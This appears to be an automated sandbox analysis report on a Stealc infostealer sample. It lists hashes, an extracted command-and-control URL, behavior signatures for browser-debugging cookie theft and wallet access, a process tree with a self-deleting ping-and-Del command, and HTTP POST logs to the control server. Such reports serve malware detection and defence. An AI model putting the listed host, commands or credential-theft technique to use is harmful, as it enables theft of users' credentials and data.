Analysis
-
max time kernel
127s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11/12/2024, 19:36 UTC
Static task
static1
Behavioral task
behavioral1
Sample
0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe
Resource
win7-20240903-en
General
-
Target
0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe
-
Size
298KB
-
MD5
92296d857af6810585aab00a73289227
-
SHA1
12ce881fdb925f146d2a906791fdebdb11736948
-
SHA256
0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1
-
SHA512
dda61c366187324b1b32050a4cbde976716be7097bb93a5a061eda0c7debc980de5ecaffe067757850b5a04ec1ef5434dc76e31a6fd9be5fafe4071935a7c24f
-
SSDEEP
3072:rWDK/Vq2xuZK5g2evjWPQM//xrkK3zODF1czQiTKyqNP9Rg9CEG8g:KDgoUuZKbaj4kjcTqgCB
Malware Config
Extracted
stealc
default
http://92.255.57.89
-
url_path
/45c616e921a794b8.php
Signatures
-
Stealc family
-
Downloads MZ/PE file
-
Uses browser remote debugging 2 TTPs 10 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2828 chrome.exe 3252 msedge.exe 5100 msedge.exe 3612 msedge.exe 2412 msedge.exe 4052 chrome.exe 3288 chrome.exe 1336 msedge.exe 968 chrome.exe 2512 chrome.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation 0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation BGHCGCAEBF.exe -
Executes dropped EXE 1 IoCs
pid Process 1648 BGHCGCAEBF.exe -
Loads dropped DLL 2 IoCs
pid Process 2604 0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe 2604 0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 900 2604 WerFault.exe 82 -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BGHCGCAEBF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4848 cmd.exe 2076 PING.EXE -
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133784577289632144" chrome.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2076 PING.EXE -
Suspicious behavior: EnumeratesProcesses 23 IoCs
pid Process 2604 0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe 2604 0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe 2604 0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe 2604 0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe 968 chrome.exe 968 chrome.exe 2604 0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe 2604 0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe 2604 0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe 2604 0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe 2536 msedge.exe 2536 msedge.exe 2536 msedge.exe 2536 msedge.exe 2536 msedge.exe 2536 msedge.exe 2536 msedge.exe 3976 msedge.exe 3976 msedge.exe 3252 msedge.exe 3252 msedge.exe 2604 0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe 2604 0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeShutdownPrivilege 968 chrome.exe Token: SeCreatePagefilePrivilege 968 chrome.exe Token: SeShutdownPrivilege 968 chrome.exe Token: SeCreatePagefilePrivilege 968 chrome.exe Token: SeShutdownPrivilege 968 chrome.exe Token: SeCreatePagefilePrivilege 968 chrome.exe Token: SeShutdownPrivilege 968 chrome.exe Token: SeCreatePagefilePrivilege 968 chrome.exe Token: SeShutdownPrivilege 968 chrome.exe Token: SeCreatePagefilePrivilege 968 chrome.exe Token: SeShutdownPrivilege 968 chrome.exe Token: SeCreatePagefilePrivilege 968 chrome.exe -
Suspicious use of FindShellTrayWindow 51 IoCs
pid Process 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 968 chrome.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe 3252 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2604 wrote to memory of 968 2604 0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe 83 PID 2604 wrote to memory of 968 2604 0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe 83 PID 968 wrote to memory of 4132 968 chrome.exe 84 PID 968 wrote to memory of 4132 968 chrome.exe 84 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 5108 968 chrome.exe 85 PID 968 wrote to memory of 3588 968 chrome.exe 86 PID 968 wrote to memory of 3588 968 chrome.exe 86 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87 PID 968 wrote to memory of 2160 968 chrome.exe 87
Processes
-
C:\Users\Admin\AppData\Local\Temp\0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe"C:\Users\Admin\AppData\Local\Temp\0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""2⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff83ccccc40,0x7ff83ccccc4c,0x7ff83ccccc583⤵PID:4132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1960,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1956 /prefetch:23⤵PID:5108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1908,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2128 /prefetch:33⤵PID:3588
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2216,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2376 /prefetch:83⤵PID:2160
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:13⤵
- Uses browser remote debugging
PID:4052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3224 /prefetch:13⤵
- Uses browser remote debugging
PID:3288
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3596,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4460 /prefetch:13⤵
- Uses browser remote debugging
PID:2512
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4760,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4764 /prefetch:83⤵PID:2608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4968,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4972 /prefetch:83⤵PID:2756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4992,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5020 /prefetch:83⤵PID:2548
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5140,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5144 /prefetch:83⤵PID:368
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5060,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5084 /prefetch:83⤵PID:4916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5088,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4996 /prefetch:83⤵PID:2980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4988,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4764 /prefetch:23⤵
- Uses browser remote debugging
PID:2828
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"2⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:3252 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ff83d9846f8,0x7ff83d984708,0x7ff83d9847183⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,16000371545025497674,6983908077783381889,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:23⤵PID:3448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,16000371545025497674,6983908077783381889,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2500 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:3976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,16000371545025497674,6983908077783381889,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2956 /prefetch:83⤵PID:3768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2076,16000371545025497674,6983908077783381889,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:13⤵
- Uses browser remote debugging
PID:3612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2076,16000371545025497674,6983908077783381889,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:13⤵
- Uses browser remote debugging
PID:5100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2076,16000371545025497674,6983908077783381889,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4052 /prefetch:13⤵
- Uses browser remote debugging
PID:2412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2076,16000371545025497674,6983908077783381889,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:13⤵
- Uses browser remote debugging
PID:1336
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\BGHCGCAEBF.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4708 -
C:\Users\Admin\AppData\Roaming\BGHCGCAEBF.exe"C:\Users\Admin\AppData\Roaming\BGHCGCAEBF.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1648 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Roaming\BGHCGCAEBF.exe4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:4848 -
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30005⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2076
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 25722⤵
- Program crash
PID:900
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:1380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4960
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 2604 -ip 26041⤵PID:2864
Network
-
Remote address:8.8.8.8:53Request232.168.11.51.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.210.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:92.255.57.89:80RequestGET / HTTP/1.1
Host: 92.255.57.89
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
POSThttp://92.255.57.89/45c616e921a794b8.php0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exeRemote address:92.255.57.89:80RequestPOST /45c616e921a794b8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJ
Host: 92.255.57.89
Content-Length: 214
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 180
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
POSThttp://92.255.57.89/45c616e921a794b8.php0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exeRemote address:92.255.57.89:80RequestPOST /45c616e921a794b8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BAFBFCBGHDGCFHJJECAF
Host: 92.255.57.89
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2028
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
POSThttp://92.255.57.89/45c616e921a794b8.php0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exeRemote address:92.255.57.89:80RequestPOST /45c616e921a794b8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHC
Host: 92.255.57.89
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 7116
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
POSThttp://92.255.57.89/45c616e921a794b8.php0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exeRemote address:92.255.57.89:80RequestPOST /45c616e921a794b8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DBFHCGCGDAAKFIECFHDB
Host: 92.255.57.89
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 108
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
POSThttp://92.255.57.89/45c616e921a794b8.php0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exeRemote address:92.255.57.89:80RequestPOST /45c616e921a794b8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEH
Host: 92.255.57.89
Content-Length: 4751
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=95
